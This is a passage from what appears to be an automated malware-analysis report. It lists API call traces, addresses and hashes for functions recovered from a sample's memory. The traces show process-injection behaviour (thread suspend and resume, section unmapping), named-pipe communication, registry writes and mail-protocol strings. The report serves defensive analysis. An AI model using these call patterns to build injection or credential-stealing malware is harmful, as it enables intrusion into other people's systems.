  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
